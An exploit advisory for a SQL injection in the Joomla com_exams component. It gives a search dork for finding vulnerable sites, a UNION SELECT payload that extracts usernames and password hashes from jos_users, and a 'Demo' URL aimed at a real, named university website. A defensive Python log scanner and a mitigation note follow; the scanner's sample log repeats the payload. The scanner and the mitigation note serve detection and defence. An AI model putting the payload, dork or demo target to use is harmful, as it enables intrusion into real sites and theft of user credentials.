The Joomla Exams component version 1.0 suffers from a remote SQL injection vulnerability.
7fb72204c3db8f49d29fed16f3f3841fc7d5fcb950c63588c54bdc61422ef727
##############################################################################
########## Joomla component "com_exams" SQL injection vulnerability ##########
########## Xploited by : Prince_Pwn3r ##########
########## Component Version : 1.0 ##########
########## Dork : inurl:"index.php?option=com_exams" ##########
########## Contact : 2p0wn0rn0t2p0wn[at]gmail.com ##########
##############################################################################
------------------------------------------------------------------------------------------------------------
Exploit:
www.site.com/index.php?option=com_exams&Itemid=27&task=displayExams&id=[SQLinj]
SQLinj:
-99999+AND+1=0+union+all+select%201,2,3,group_concat(username,0x3a,password),5,6+from+jos_users--
Demo:
https://www.ffri.hr/index.php?option=com_exams&Itemid=27&task=displayExams&id=-99999+AND+1=0+union+all+select%201,2,3,group_concat(username,0x3a,password),5,6+from+jos_users--
-------------------------------------------------------------------------------------------------------------
Greetz to all p0wnbox.com members,N0F4T3,JohnTG,Sol,AnalyseR and to all
friends out there.
-----------------------------------------------+-------------------------------------------------------------
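
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access-log lines for com_exams requests whose id parameter is not a plain integer. The log lines are constructed samples, and treating id as digits-only is an assumption based on the numeric id in the advisory's URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate exam id is decimal digits only.
VALID_ID_RE = re.compile(r"\d{1,10}")

def suspicious_exams_request(log_line):
    """Return the decoded id value when the line is a com_exams request
    whose id is not a plain integer; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs decodes '+' and %XX, so encoded payloads are compared in clear.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    # PHP keeps the last value of a repeated parameter, so check that one.
    if query.get("option", [""])[-1].lower() != "com_exams":
        return None
    for value in query.get("id", []):
        if not VALID_ID_RE.fullmatch(value.strip()):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_id) for every flagged log line."""
    hits = []
    for line in lines:
        bad_id = suspicious_exams_request(line)
        if bad_id is not None:
            hits.append((line.split()[0], bad_id))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_exams&Itemid=27&task=displayExams&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_exams&Itemid=27&task=displayExams&id=-99999+AND+1=0+union+all+select%201,2,3,group_concat(username,0x3a,password),5,6+from+jos_users-- HTTP/1.1" 200 7312',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=3:about HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, bad_id in scan(SAMPLE_LOG):
        print(f"{client} sent non-integer id to com_exams: {bad_id!r}")
```

The same digits-only rule applied inside the component, by casting id to an integer before it reaches the query, removes the injection point. POST bodies are not present in access logs, so this check covers query-string requests only.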